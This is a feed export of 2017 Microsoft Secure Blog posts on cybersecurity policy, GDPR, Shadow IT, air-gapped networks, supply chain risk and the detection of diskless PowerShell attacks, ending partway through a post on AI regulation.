Microsoft Secure Blog In-depth discussion of security, cybersecurity and technology trends affecting trust in computing, as well as timely security news, trends, and practical security guidance 2017-05-22T16:00:10Z https://blogs.microsoft.com/microsoftsecure/feed/atom/ WordPress Microsoft Secure Blog Staff <![CDATA[7 types of highly effective hackers (and what to do about them)]]> http://blogs.microsoft.com/microsoftsecure/?p=68335 2017-05-22T16:00:10Z 2017-05-22T16:00:06Z Read more »]]> Would you know what to do if you drew the attention of a hacktivist group? Knowing that damages from a hacktivist attack are typically minor is no relief, as a breach will surely damage your reputation. However, knowing about the different types of hackers, what motivates them, and the tools and techniques they use, can help better prepare your organization to protect against them.

Attacks on organizations around the world are on the rise. Millions of dollars of intellectual property are at risk, as well as the threat of lost productivity. Threats now come from a wide range of sources including:

  • Script Kiddies who exploit existing code to hack for fun
  • Hacking Groups that work together to attack governments and companies
  • Hactivists who use hacking skills to promote an agenda
  • Black Hat Professionals who make a living from hacking
  • Organized Criminal Gangs that steal data to make money
  • Nation States that do political and economic espionage
  • Cyberweapons Dealers who sell to exploit to other hackers

Learn more about the 7 different hackers and get recommendations on how you can better prepare your organization against their potential threats in this free eBook: 7 Types of Highly Effective Hackers.

 

]]>
Paul Nicholas http://blogs.technet.com/Paul-Nicholas-_2D00_-TwC/ProfileUrlRedirect.ashx <![CDATA[More than just an ocean separates American and European approaches to cybersecurity]]> http://blogs.microsoft.com/microsoftsecure/?p=68461 2017-05-18T21:31:14Z 2017-05-17T16:00:15Z Read more »]]> The recent revision of the National Standards and Technology Institute’s (NIST) Cybersecurity Framework and the publication of European Network and Security Agency’s (ENISA) proposals on implementation of the Network and Information Security (NIS) Directive have made me pause and ponder the progress made (or indeed not) in securing our critical infrastructures since they were both introduced. I was also struck by how much the differences in political culture affect policy outcomes, even when these are largely supported by the broad ecosystems they seek to regulate and/or influence.

The starting point was strikingly similar for both economic powers: the Directive and the Framework seek to improve cybersecurity of critical infrastructures. They came out at around the same time in early 2013, when the European Commission first introduced the Directive and when Obama signed the Executive Order that set out the process that ultimately resulted in the Cybersecurity Framework.

Given the considerable differences in the US and the EU political, legislative and executive “machines” it is no surprise that, even with these common starting points, the two have followed very different paths. The Framework is undergoing its first major revision in 3 years based on changes in threat and experiences of global adopters. The Directive is now only beginning the implementation phase in the  EU member states.

The NIST’s creation of the Framework has been rightly held up as a successful example of public-private partnership. It used an open, collaborative and iterative development process to harness the expertise and experience of cyber and non-cyber stakeholders, hosting numerous open workshops and consulting widely, and not just within the US itself. The result was a Framework that is now being referenced around the world, by businesses and governments and it is being considered as a starting point for ISO 27103.

On the other hand, the processes of aligning 28 different sets of national cybersecurity agendas, and of securing a common view from a European Parliament that has somewhere between four and six major party groups, took considerably longer than the gestation of the Framework. It was a monumental effort and investment on the part of Europe. There were working groups and workshops too, but perhaps because of the efforts to coordinate the necessary agreements at the “top” the resulting Directive lacked some of the obvious “bottom-up” characteristics of the Framework. But the benefit of the Directive, creates durable institutions in EU member states, coordination processes, and security baselines. As a result, the it is likely to result in a very different return on investment than the Framework.

But this should not just be a story of different approaches to cybersecurity policy. The EU approach to building institutions and setting capabilities requirements, if implemented and evolved, will help provide a layer of coordination and security that did not exist. The Framework’s voluntary nature and global adoption is better at preparing enterprises – public and private – for improving risk management measures.

These are substantial differences, from the perspective of both businesses and regulators in these two approaches. However, in the end they may complement each other more than we see today. For example, several EU member states already reference the Framework within their approaches to cybersecurity as they seek to leverage implementing terminology and standards. Looking forward, therefore, it is possible that the two approaches could converge in practical ways. Parts of the Framework might evolve into an international standard, as referenced above, one that can be utilized by a great number of countries. Equally, the implementation of the Directive at EU member state level, and the identification of reference standards, could establish a model that other regions might follow.

Cybercriminals and cyberattacks will inevitably be encouraged and enabled by serious divergence in approaches to cybersecurity, wherever in the world these occur. As such, it seems essential that steps are taken on both sides of the Atlantic to ensure closer harmonization, both to improve the situation of the US and the EU and to set an example to the rest of the world.

]]>
Microsoft Secure Blog Staff <![CDATA[How the Asia-Pacific region is advancing cybersecurity]]> http://blogs.microsoft.com/microsoftsecure/?p=68431 2017-05-15T16:00:51Z 2017-05-15T16:00:49Z This post is authored by Angela McKay, Director of Cybersecurity Policy.

Earlier this year, my team and I had the great privilege and pleasure of spending several days in Japan, participating in the Information Technology Promotion Agency (IPA) Symposium. We also met with industry colleagues to discuss global cybersecurity trends and opportunities to engage in public policy, and met with Japanese government partners to examine the question of cloud security.

Even just a few days in Tokyo demonstrated that the focus on the importance of cybersecurity is growing in Japan and across the Asia-Pacific region, within both government and industry. The understanding that concrete action is now needed is also growing.

Japan is well positioned for regional leadership in this space. The size of the IPA symposium, the seniority of both attendees and speakers, and the maturity of the conversation underscored this. In Japan, cybersecurity is clearly evolving from an issue of interest solely to technically inclined geeks, to one that is a major concern for the government, businesses, and consumers. The policy debate is shifting from conceptual discussions to more practical consideration, such as the development of security practices and requirements, particularly for critical infrastructure and government.

What is particularly praise-worthy and unique in the Japanese approach, is the iterative way the government is tackling challenges in this space, dynamically reprioritizing and emphasizing different areas based on changes in technology and risks, and the effectiveness of its various efforts. For example, while the Basic Cybersecurity Law and National Cybersecurity Strategy were adopted more than two years ago, the government has since repeatedly consulted and reexamined areas where outcomes have proven to be difficult to attain, for example cross-government cooperation on cybersecurity.

Japan is not alone in grappling with how to govern cybersecurity; however, it is one of the few governments which understands that cybersecurity is not an area that can be looked at once and then ignored for the next decade. It is using the impetus behind the 2020 Olympics and Paralympics to increase cyber resilience, examining how new technologies, such as cloud computing, can increase security of the government, critical infrastructures, and for the Internet of Things (IoT). It actively seeks to assess progress with 2020 in mind, for example by considering whether and how cybersecurity information sharing is increasing the security of the Games and key sectors of the economy. It does this not just through forming ISACs but by partnering with the private sector to ensure that 1) sharing is focused on risk management outcomes and 2) cultural and structural obstacles that might be particular to Japan are understood and addressed.

A similar approach is being pursued when it comes to encouraging critical infrastructure sectors to adopt risk management practices. The government has been consulting on its guide, as they are realizing that while the voluntary nature of their cybersecurity efforts remains pivotal, many of the private sector enterprises are looking for more specific guidance on how to move forward in this area. In our response, Microsoft therefore suggested developing a model similar to the one put forward by NIST with its Cybersecurity Framework, where the government and private sector collaborated to develop guidance that built on proven standards and best practices within an overarching framework that is meaningful to executives.

Beyond this pragmatic approach, Japan also continues to drive thought leadership in important new areas. Japan recently announced a new partnership with Germany to establish an Internet of Things (IoT) standard for commercial and industrial organizations, as well as proposals on how to best secure this new area of innovation. This has given Japan a unique opportunity, perhaps even a responsibility as a genuine world leader in this space, to start articulating the security concerns that should be addressed by players in IoT services (with a link to our NTIA response for more detail). Their solutions, including the use of incentives to drive behaviors, will be looked at by other governments, not just regionally but across the globe.

In the era of digitalization, every government and organization should look to and incorporate and codify effective initiatives and programs, such as Japan’s, into their policies and operations. Microsoft is excited to work alongside Japan and other Asia-Pacific countries to build a global culture of strong cybersecurity principles that create a trustworthy high-tech world. It will require the leadership of countries such as Japan and the commitment of industry leaders such as ourselves to ensure the safety and security in the digital space.

]]>
Microsoft Secure Blog Staff <![CDATA[Use Enterprise Threat Detection to find “invisible” cyberattacks]]> http://blogs.microsoft.com/microsoftsecure/?p=68242 2017-05-10T16:00:39Z 2017-05-10T16:00:36Z Read more »]]> This post is authored by Roberto Bamberger, Principal Consultant, Enterprise Cybersecurity Group.

Amongst the plethora of stories about cyberattacks in the news, multiple recent articles have been published describing the more difficult to detect cyberattacks which leverage normal tools, already present in an enterprise, to achieve their mission. SecureList calls the techniques used in these situations “invisible” and “diskless”. This post describes the challenges your organization can face in detecting such attacks with typical detection techniques and what you can do to protect against them.

To begin, consider that many of these attacks use native capabilities in Microsoft Windows such as PowerShell in order to avoid having to store files on disks which are routinely scanned and could be discovered by antivirus products. That is why Microsoft has developed multiple capabilities that can detect such attacks including:

  1. Microsoft Enterprise Threat Detection
  2. Windows Defender Advanced Threat Protection
  3. Microsoft Advanced Threat Analytics

Here is a summary of why these can help you.

The Microsoft Enterprise Threat Detection (ETD) service, is a managed detection service, able to detect invisible/diskless attacks and provide enterprises with actionable intelligence to effectively respond to these threats. Windows 10 also includes Windows Defender Advanced Threat Protection (Windows Defender ATP). This feature along with Antimalware Scan Interface (AMSI) and Microsoft Advanced Threat Analytics (ATA) provide you with user and entity behavioral analysis capabilities which can be effective in detecting such threats and their associated malicious behaviors.

Enterprise Threat Detection can consume a variety of data sources:

  • Windows error reports can contain memory of a faulting process, registry keys, files, and the results of WMI queries
  • Telemetry sent from the organization’s IP egress ranges in the form of the Microsoft Active Protection System (MAPS)
  • Data received by the Microsoft Digital Crimes Unit as part of its botnet disruption and eradication efforts
  • Using ATA and Windows Defender ATP on Windows 10 monitors those signals and provides advanced detection and response data

To illustrate leveraging the Windows Error Reporting data for this type of advanced analysis, the Microsoft ETD team recently received an event from a customer environment, which was due to a crash in PowerShell.

In this case, PowerShell was executing an object stored in a base64 encoded string. Automated analysis of the memory of the PowerShell process indicated contained code consistent with malicious code in the form of shellcode:

In this case, further analysis revealed that the code was being reflectively loaded into the PowerShell process attempts to download additional code from an external source. Using advanced analysis tools, ETD analysts determined the name of the server and file that was being requested.

Analysis of the payload returned from this internet resource revealed that the attacker was establishing a reverse shell and loading the metasploit meterpreter, a popular penetration testing tool.  However, the meterpreter code was never written as a file to disk, therefore it was diskless, loaded only from an external site, making detection within the customer environment difficult.

Microsoft ETD analysts quickly analyzed the event, determined it was malicious, and informed the organization of the nature of the attack, providing them with actionable intelligence. This specific actionable intelligence included indicators of attack that can be used to analyze additional data such as proxy logs, to determine if this activity was still ongoing and/or impacting other machines in their environment.

In conclusion, organizations need to be aware of this type of malicious behavior becoming more prevalent in cybercrime. Microsoft has many insights and tools for enterprises to help keep their environments protected. For information about Enterprise Threat Detection services, contact your Microsoft Account Team or email mtds@microsoft.com.

]]>
Microsoft Secure Blog Staff <![CDATA[How the GDPR is driving CISOs’ agendas]]> http://blogs.microsoft.com/microsoftsecure/?p=68281 2017-05-09T17:44:23Z 2017-05-09T16:00:42Z Read more »]]> This post is authored by Daniel Grabski, Executive Security Advisor, Enterprise Cybersecurity Group.

As an Executive Security Advisor for the Central and Eastern European region, I engage every day with Chief Information Security Officers (CISOs) to learn their thoughts and concerns. One very hot topic raised at nearly every meeting, conference or seminar I attend with customers and partners, regards the General Data Protection Regulation or GDPR. In essence, the GDPR is fundamentally about protecting and enabling the privacy rights of individuals. It establishes strict global privacy requirements governing how you manage and protect personal data while respecting individual choice – no matter where data is sent, processed, or stored.

Without a doubt, GDPR is one of the biggest changes coming to European Union privacy laws in recent years. It is a complex regulation that may require significant changes for every company that:

  1. Is established in the EU.
  2. Sells goods or services in the EU.
  3. Monitors and processes data of those in the EU, regardless of where that processing and monitoring takes place.

The GDPR requirements may also include the technology used within organizations, as well relevant people and processes required to be in place to manage all the stages. Even once the GDPR is enforced as of 25 May 2018, compliance will be an ongoing process.

In this post, in order to help answer the most common questions I hear from CISOs, I will briefly address the following:

  • What does Microsoft’s journey to GDPR compliance look like?
  • What can I do today?
  • What is the role of my cloud provider?
  • How can technology help me with compliance?

What does Microsoft’s journey to GDPR compliance look like?

Microsoft wears many hats under the GDPR: we offer consumer services for which we are a controller, we offer enterprise online services for which we are a processor, and setting aside our role as a technology company, we are an international company with a global employee base. This means that we are going through the same journey as your organization and are innovating to make GDPR compliance simpler for our customers by May 2018. As stated in a recent blog post by Brendon Lynch, Chief Privacy Officer at Microsoft, “To simplify your path to compliance, Microsoft is committing to be GDPR compliant across our cloud services when enforcement begins on May 25, 2018. We have also committed to share our experience complying with complex regulations, to help you craft the best path forward for your organization to meet the privacy requirements of the GDPR.”

You can read and observe the Microsoft journey to GDPR compliance and recommendations via our website and the Get GDPR compliant with the Microsoft Cloud blog. On the website, you will find a whitepaper which describes how Microsoft enterprise products and cloud services can help you to be ready for GDPR.

From my discussions with customers and partners, I can attest that many are keenly aware of GDPR requirements. However, awareness and readiness currently span a large divide. About one third have not yet begun the journey, another third is just beginning the process, and the final third are actively working to map GDPR requirements to their current processes and technology stack.

GDPR is not only the responsibility of the Chief Information Security Officer or Data Privacy Officer, but of the entire C-suite. It is not just about the application of technology, but it is important to consider the processes involved and align them to the new regulation. Last, but not least, it is also a topic that every employee should be aware of – from the executive level to operations. It is of paramount importance to give proper awareness and training across the company, emphasizing the importance of GDPR, its impact on the company operations and the consequences in the case of not complying with GDPR requirements. Therefore, becoming GDPR complaint includes the full scope of alignment of people, processes and technology.

What can I do today?

We recommend you begin your journey to GDPR compliance by focusing on four key steps (see Figure 1 below):

  • Discover—identify what personal data you have and where it resides. This is fundamental to any good risk management practice, and is critical with the GDPR as one can only protect and manage data, as required by the GDPR, when the data is identified.
  • Manage— execute on data subject requests, govern how personal data is used and accessed. Make sure that data is only used for the purposes it was intended for and accessible only to those with a need to access it.
  • Protect—establish security controls to prevent, detect, and respond to vulnerabilities and data breaches. By properly securing your data across its lifecycle, you will reduce the risk of a breach occurring. Knowing when and if a breach occurs, can help you keep the data protection authority informed.
  • Report—report data breaches, and keep required documentation. Proving you are governing data in the right way and successfully handling data subject requests is the core of compliance.

Figure 1: Four steps to GDPR compliance

The Beginning your GDPR Journey whitepaper provides more details on the steps and the technologies available today to help you.

What is the role of my cloud provider?

This is a common question I hear from CISOs looking across their complex environments, as they try to understand what role their cloud provider plays in addressing the requirements of the GDPR.  The GDPR requires that controllers only use processors that have committed to comply with the GDPR and to support compliance efforts of controllers. Microsoft is the first major cloud service provider to make this commitment. That means, Microsoft will meet the stringent security requirements of GDPR.

Fundamentally, GDPR is also about a shared responsibility and trust. It requires a cloud service provider with a principled approach to privacy, security, compliance and transparency such as Microsoft. Trust can be viewed from many different angles, including how the provider is securing its own, and their customer’s, infrastructure to manage cybersecurity risks. How is data protected? What mechanism and principles are driving the approaches and practices in this very sensitive area?

Microsoft invests $1 billion per year to protect, detect and respond to security incidents, within the company, and on behalf of customers and the millions of victims of cybercrime around the globe. In November 2015 we announced the Microsoft Cyber Defense Operations Center (CDOC). This facility brings together security experts from across the company to help protect, detect and respond to cyber threats in real-time. CDOC dedicated teams operate 24×7, and the center has direct access to thousands of security professionals, data analysts and scientists, engineers, developers, program managers, and operations specialists throughout the Microsoft global network. This ensures rapid detection, response and resolution to security threats.

Figure 2: Cyber Defense Operations Center (CDOC)

Microsoft openly shares how we protect our own and our customers’ infrastructures. Read more about best practices used in the Cyber Defense Operations Center. The CDOC also leverages the power of the cloud through the Microsoft Intelligent Security Graph (ISG).

Every second of every day, we add hundreds of gigabytes worth of telemetry to the Security Graph. This anonymized data is coming from:

  • hundreds of global cloud services, both consumer and commercial
  • data about cyber threats faced by the +1 billion PCs we update via Windows Update every month
  • external data points we collect through extensive research, partnership with industry and law enforcement through the Microsoft Digital Crimes Unit

To give you a visual of what that means, we add to the Security Graph with data from the 300 billion monthly authentications across our consumer and enterprise services, as well as the 200 billion e-mails that are analyzed each month for malware and malicious websites.

Figure 3

Imagine all of this data coming together in one place. Think of how the insight that provides can help to anticipate and defeat attacks, protecting your organization. As you can see in Figure 3, we analyze feedback, malware, spam, authentications, and attacks. For example, data from millions of Xbox Live devices show how they are being attacked, and we learn how to apply that to better protect our customers. Much is incorporated through machine learning and data scientist analysis to better understand the newest techniques of cyber attacks.

In addition to the CDOC, the Digital Crimes Unit and the Intelligent Security Graph, Microsoft also created a dedicated team of enterprise cybersecurity professionals to help move you securely to the Cloud and protect your data. These are just a few examples of the continuous investments Microsoft makes in cybersecurity, that are crucial to create products and services that support your compliance with the GDPR.

How can technology help me with compliance?

Fortunately, there are many technology solutions to help with GDPR compliance. Two of my favorites are Microsoft Azure Information Protection (AIP) and Advanced Threat Protection (ATP) in Exchange Online. AIP ensures your data is identifiable and secure, a key requirement of GDPR – regardless of where it’s stored or how it’s shared. With AIP you can instantly get to work on Steps 1 & 2 mentioned above, to classify, label and protect new or existing data, to share it securely with people within or outside of your organization, to track usage, and even to revoke access remotely. It is intuitive, easy to use and a powerful solution that also includes rich logging and reporting to monitor the distribution of data, and options to manage and control your encryption keys.

When you are ready for step 3 in your GDPR compliance journey, Advanced Threat Protection (ATP) addresses the core requirement of GDPR to protect the personal data of individuals against security threats. Office 365 includes features that safeguard data and identify when a data breach occurs.  One such feature is Advanced Threat Protection (ATP) in Exchange Online Protection that helps protect email against new, sophisticated malware attacks in real time. ATP also provides a way to create policies that prevent users from accessing malicious email attachments or malicious websites linked through emails. For example, with the Safe Attachments feature you can prevent malicious attachments from impacting your messaging environment, even if their signatures are not known. All suspicious content goes through a real-time behavioral malware analysis that uses machine learning techniques to evaluate the content for suspicious activity. Unsafe attachments are sandboxed in a detonation chamber before being sent to recipients.

In conclusion

A recent issue of the Economist explained, “How to manage the computer security threat.” Their top recommendation was that both government and product regulations must lead the way. Without a doubt GDPR needs to be seriously addressed as a top priority on the agenda of every CISO now and beyond May 2018. This is a continuous commitment to security and privacy. By becoming more regulated through GDPR, providing a framework to better protect personal data, and giving tools to implement security controls for protecting, detecting and responding to threats, we will fight our best fight against cyber crime. Microsoft stands ready to work with CISOs to raise awareness, empower and ensure access to the resources available now and in the future.

Learn more about Microsoft GDPR and general security with these helpful resources:


About the author:
Daniel Grabski is a 20-year veteran of the IT industry, currently serving as an Executive Security Advisor for Europe, Middle East and Africa time zone in the Enterprise Cybersecurity Group at Microsoft. In this role, he focuses on enterprise, partners, public sector customers and critical security stakeholders.  Daniel delivers strategic security expertise and advice around cybersecurity solutions and services which are needed to build and maintain secure and resilient ICT infrastructure.

]]>
Microsoft Secure Blog Staff <![CDATA[It’s time for a new perspective on Shadow IT]]> http://blogs.microsoft.com/microsoftsecure/?p=67380 2017-05-08T16:00:05Z 2017-05-08T16:00:22Z Read more »]]> Over 80 percent of employees admit to using non-approved SaaS applications in their jobs, and for the most part they have well-intentioned reasons for adopting them. Many report wanting to use software they are familiar with, that is cheaper, quicker to deploy, and better meets their needs than the IT-approved equivalent. This isn’t just about personal preference. It allows employees to skip the learning curve of new software and enables the business to move more quickly.

Empowering employees find creative solutions to business problems and enabling easy access to tools they need are key to driving innovation and productivity.

Flexibility to use preferred tools can also help attract the next generation of talent. Younger workers have grown up using the apps and devices they want to get things done in the way that works for them. Nearly 50% prefer tools like chat and messaging, and they are twice a likely as boomers to prefer meeting online versus in person. While the urge to block Shadow IT is understandable, it may signal to new employees that your company culture isn’t open to the new and innovative solutions that often characterize successful businesses.

IT should look for solutions that give employees the freedom to choose the apps they want, while still ensuring the security and compliance your organization demands. One of those solutions is to use a Cloud Access Security Broker.

Empower your workforce with a Cloud Access Security Broker (CASB)

CASB solutions give you a detailed picture of the cloud apps your employees use and help you to monitor and manage them effectively.

A good CASB solution discovers which cloud apps are in use and brings them under the hood into a single interface. Each app is then rated for risk based on industry standards and best practices, so you can easily scan and set policies for how users interact with each app. A good CASB solution can also help protect those apps from advanced security threats.

With better visibility, control, and protection over your Shadow IT, you can help empower greater productivity and manage your security risk. Curious to learn more? Check out our new e-book: Bring Shadow IT into the Light.

]]>
Paul Nicholas http://blogs.technet.com/Paul-Nicholas-_2D00_-TwC/ProfileUrlRedirect.ashx <![CDATA[Singapore: Realizing that for the future to be smart, it needs to be secure]]> http://blogs.microsoft.com/microsoftsecure/?p=68163 2017-05-03T16:00:46Z 2017-05-03T16:00:21Z Read more »]]> In 2005, just over a decade ago, the majority of large internet user populations, certainly as a percentage of their total national population, were still to be found in North America and Europe. In 2025, less than a decade from now, many of the largest internet user populations will be in Asia. Asia will be a fulcrum of cyberspace and it will also be, inevitably, a fulcrum of both cybercrime and cybersecurity. As such, cybersecurity policy decisions being made today in Asia will significantly shape cyberspace in 2025 and beyond. Given the interconnected nature of cyberspace, their impact will be global.

While many analysts focus on Asia’s large political and economic players, such as Tokyo and Beijing, I will take a look at Singapore, whose smaller size has allowed it to be agile and power ahead in terms of online innovation. It is clear that the government realized that technology is central to both the country’s current economic success and its future prospects. Not only has it strived to make Singapore a hub for industries highly reliant on technology, such as financial services, it has focused its investments to ensure the country can become a true “Smart Nation”. That has meant being bold in adopting new technologies and, on occasion, facilitating experimentation, for example through the recently outlined a “big data sandbox” initiative.

Moreover, Singapore has also realized that it can only be successful in this space if it can adopt technology securely. Its approach, which is to give clear guidance to key parts of the economy and to cooperate closely with the private sector to help create, refine and enact that guidance with an eye to ensuring future innovation, is a worthwhile example for other Asian governments. Its early push in ensuring key industry sectors can move to the cloud securely through the adoption of the Multi-Tier Cloud Security standard, has been followed by complementary initiatives, such as the Cloud Implementation Guide, developed by the Association of Banks in Singapore (ABS). Central to the success of both of the documents has been a close partnership with those they intended to guide, i.e. both cloud providers and those adopting new technologies. This mirrors the positive model of public-private engagement that underpinned the successful NIST Cybersecurity Framework in the United States.

More recently, the Singaporean Cybersecurity Agency (CSA) has made cybersecurity even more of a priority for the country. The Cybersecurity Strategy, launched in October 2016, aims to build a resilient and trusted cyber environment by focusing on four pillars: i) Building a Resilient Infrastructure; ii) Creating a Safe Cyberspace; iii) Developing a Vibrant Cybersecurity Ecosystem; and iv) Strengthening International Partnerships. First outcomes can already be seen, with the revised Cybercrime Act adopted in April.

Moreover, the government has already begun consultations on its Cybersecurity Act, which we expect to be introduced by the end of the year. It will be interesting to observe whether Singapore follows models that have been put forward by the above-mentioned NIST Cybersecurity Framework, or takes an approach closer to that put forward by the European Union with the Network and Information Security Directive. On the other hand, it could put forward its own model. After all, frameworks for protecting critical infrastructure online are evolving. Countries are debating the benefits of regulatory vs. voluntary approaches, struggling to balance information sharing and incident reporting, and managing the role of regulators in an area that cuts across typical boundaries between industry sectors.

Singapore is not, however, only looking inwards. It is making an active contribution to regional cybersecurity, having launched an ASEAN Cyber Capacity Program (ACCP). As well as capacity-building activities, developing technical skills, and incident response capabilities, the ACCP will support discussion and consultancy work in areas such as the creation of national cybersecurity agencies, cybersecurity strategies, and even cybersecurity legislation. This initiative highlights an important understanding: that in an interconnected world, an individual, organisation or state is only as safe in cyberspace as its weakest link.

Although I remain concerned that Singapore’s approach to network separation could create problems for government, business and citizens, what distinguishes Singapore’s approach, overall, is its determination to tackle cybersecurity without cutting off its connections to the region and the world. Perhaps for an island nation that depends upon commerce the logic of putting up barriers is particularly inimical, but it nonetheless demonstrates that it can be done: governments can build cybersecurity without harming openness and innovation. Looking at Singapore, I would hope that other governments, not just in Asia but around the world, can see that infrastructure, businesses and citizens can all be protected without the loss of the interconnectedness and opportunities of cyberspace.

 

 

]]>
Paul Nicholas http://blogs.technet.com/Paul-Nicholas-_2D00_-TwC/ProfileUrlRedirect.ashx <![CDATA[Mind the air gap: Network separation’s cost, productivity and security drawbacks]]> http://blogs.microsoft.com/microsoftsecure/?p=68148 2017-05-01T16:00:28Z 2017-05-01T16:00:49Z Read more »]]> In some of my recent discussions with policy-makers, network separation, i.e. the physical isolation of sensitive networks from the Internet, has been floated as an essential cybersecurity tool. Why? It promises the holy grail of security, i.e. 100% protection, because cyberattacks can’t cross the “air gap” to reach their target.

In my experience, however, network separation has its place in the governments’ cybersecurity toolkit but it also suffers from significant drawbacks. These include: costs of implementation and maintenance; diminished productivity; and, perhaps counterintuitively, degradation in some key aspects of security. Overall, network separation is out of step with a world where systems’ interconnectivity is underpinning innovation driven by cloud computing and the Internet of Things (IoT). I’m going to use this blog to look a little more closely at these issues.

Network separation is an established and recognized security practice in critical sectors, e.g. classified military networks or nuclear power plants. The potential consequences of these systems being compromised are sufficiently bad to justify any downsides that network separation might introduce. However, as governments consider implementing network separation more broadly, that cost/benefit calculation must change.

Looking at costs alone, creating separate networks means increased expenditure of limited resources and reduced economies of scale. An “air gap” demands creating a whole new network with standalone servers, routers, switches, management tools, etc. That network needs to be built to deliver the foreseeable peak demand, which might only occur every now and then. This largely unused capacity is effectively wasted, whereas a non-separated network could simply use temporary cloud resources to “scale up” when needed. Costs increase further because software maintenance cannot be done by a remote centralized hub, whilst physical maintenance is more time consuming.

Network separation can also harm efficiency, productivity and usability. An “air gap” creates barriers to the outside world, which most government workers need to best serve their constituencies. Having to turn attention and move information between different devices, some separated and some not, would be time consuming at best and confusing at worst. And many government services and systems that are meant to interact directly with citizens are likely to be slowed and made more cumbersome by separation protocols. The benefits of smart cities and smart nations will be significantly diminished if governments forsake cloud and IoT benefits in the name of network separation.

Finally, even network separation’s security benefits are not foolproof. For one thing, being disconnected from threats frequently means being disconnected from cybersecurity innovation, let alone mundane security tools such as patches. Moreover, the assumption of being safe on the other side of an “air gap” can mean staff and management take essential security basics for granted. Indeed, a poor cybersecurity culture within any organization means social engineering or human error can give malicious actors a way into a system, e.g. as employees circumvent cumbersome requirements by relying on their private (and often insecure) email.

Furthermore, the “air gap” itself can be circumvented. Just one connection with the outside world creates a single point of failure for malicious actors to exploit and even with no direct connection there are ways “in”. As Stuxnet showed, removable media such as USB drives can insert malware into physically separated hardware, whilst some forms of hacking are able to “jump” the “air-gap”, e.g. USBee (a “software-only method for short-range data exfiltration using electromagnetic emissions from a USB dongle”) and AirHopper (turns a computer’s video card into an FM transmitter to collect data from “air-gapped” devices).

For governments concerned about the growing scale, frequency, sophistication and impact of cyberattacks there can be legitimate reasons for adopting network separation. In limited sets of circumstances, e.g. protecting classified networks, it can be part of an appropriate, risk-management based cybersecurity response. That being said, it is essential for governments to understand the tradeoffs in cost, usability, and effectiveness that the approach introduces. Network separation is not and cannot be the right or the only answer to all of their cybersecurity concerns.

]]>
Paul Nicholas http://blogs.technet.com/Paul-Nicholas-_2D00_-TwC/ProfileUrlRedirect.ashx <![CDATA[Supply chain security demands closer attention]]> http://blogs.microsoft.com/microsoftsecure/?p=68037 2017-04-26T16:00:13Z 2017-04-26T16:00:34Z Read more »]]> Often in dangerous situations we initially look outwards and upwards for the greatest threats. Sometimes we should instead be looking inwards and downwards. Supply chain security in information and communication technology (ICT) is exactly one of those situations where detailed introspection could be of benefit to all concerned. The smallest security breach can have disastrous implications, irrespective of whether the attackers’ entry point is within one’s own system or within that of a supplier. ATM breaches, which can expose hundreds of millions of people’s personal information, are one example of how an attack can occur via a contractor.

My experience over the last fifteen or more years of cybersecurity policy work is that in a diverse, globalized and interconnected world, supply chains can pose a major cybersecurity threat if left unmanaged. Many products are built up from elements that are created and modified by different companies in different places. This is as true of software as it is of hardware. Global supply chains create opportunities for the introduction of counterfeit elements or malicious code. The problem is not concentrated in one region and the consequences can be global.

The situation not wholly new nor is it wholly unknown. From Microsoft’s perspective, based on our experience in the cyber supply chain risk management (C-SCRM) space and in line with our broad approach to all cybersecurity issues, the best approach to validating ICT products and components is risk-based. If I was to put forward basic elements of a supply chain risk management stance they would include:

  • A clear understanding of the critical supply chain risks that need to be mitigated, which will require regular evaluation and adjustment as threats or technologies change;
  • Principles and practices that take account of the lifecycle of threats whilst promoting transparency, accountability and trust between companies themselves and between companies and the authorities;
  • An understanding that flexibility is critical, given i) vendors’ differing business models and markets, and ii) that seemingly simple changes in technology can rapid change threat models; and,
  • A holistic approach to C-SRCM-based technical controls, operational controls, and vendor & personnel controls.

In addition to effective risk management, I can see a clear case for international standards in international supply chains. If we recognize that even the smallest weakness in a jurisdiction “over there” might be a way in for cyber criminals “over here”, international standards would be a common basis for judging whether or not a supply chain can be secure in its fundamentals.

Governments considering how to make their ICT supply chains more secure need to solicit industry feedback on their proposals. Indeed, I would argue that public-private partnerships to develop supply chain proposals are the best way to approach the issue. Both states and companies gain by cooperating in the fight against supply chain-led cyberattacks.

Microsoft depends on the trust our customers place in our products and as a multinational company, we understand the relevance of secure cross-border supply chains. So, even if C-SCRM is rarely the first thing considered when looking at cybersecurity, we will continue to make the case for a comprehensive and global approach to securing ICT supply chains that is risk-based, transparent, flexible and standards-led.

]]>
Paul Nicholas http://blogs.technet.com/Paul-Nicholas-_2D00_-TwC/ProfileUrlRedirect.ashx <![CDATA[How future policy and regulations will challenge AI]]> http://blogs.microsoft.com/microsoftsecure/?p=67947 2017-04-25T16:00:37Z 2017-04-25T16:00:31Z Read more »]]> I recently wrote about how radical the incorporation of artificial intelligence (AI) to cybersecurity will be. Technological revolutions are however frequently not as rapid as we think. We tend to see specific moments, from Sputnik in 1957 to the iPhone in 2007, and call them “game changing” – without appreciating the intervening stages of innovation, implementation and regulation, which ultimately result in that breakthrough moment. What can we therefore expect from this iterative and less eye-catching part of AI’s development, looking not just at the technological progress, but its interaction with national policy-making process?

I can see two overlapping, but distinct, perspectives. The first relates to the reality that information and communication technology (ICT) and its applications develop faster than laws. In recent years, examples of social media and/or ride hailing apps have seen this translate into the following regulatory experience:

  1. Innovation: R&D processes arrive at one or many practical options for a technology;
  2. Implementation: These options are applied in the real world, are refined through experience, and begin to spread through major global markets;
  3. Regulation: Governments intervene to defend the status quo or to respond to new categories of problem, e.g. cross-border data flows;
  4. Unanticipated consequences: Policy and technology’s interaction inadvertently harms one or both, e.g. the Wassenaar’s impact on cybersecurity R&D.

AI could follow a similar path. However, unlike e-commerce or the shared economy (but like nanotechnology or genetic engineering) AI actively scares people, so early regulatory interventions are likely. For example, a limited focus on using AI in certain sectors, e.g. defense or pharmaceuticals, might be positioned as more easily managed and controlled than AI’s general application. However, could such a limit really be imposed, particularly in the light of potential for transformative creative leaps that AI seems to promise? I say that would be unlikely – resulting in yet more controls. Leaving aside the fourth stage of unknown unknowns of unanticipated consequences, the third phase, i.e. regulation, would almost inevitably run into trouble of its own by virtue to having to legally define something as unprecedented and mutable as AI. It seems to me, therefore, that even the basic phases of AI’s interaction with regulation could be fraught with problems for innovators, implementers and regulators.

The second, more AI-specific perspective is driven by the way its capabilities will emerge, which I feel will break down into three basic stages:

  1. Distinction: Creation of smarter sensors;
  2. Direction: Automation of human-initiated decision-making;
  3. Delegation: Enablement of entirely independent decision-making.

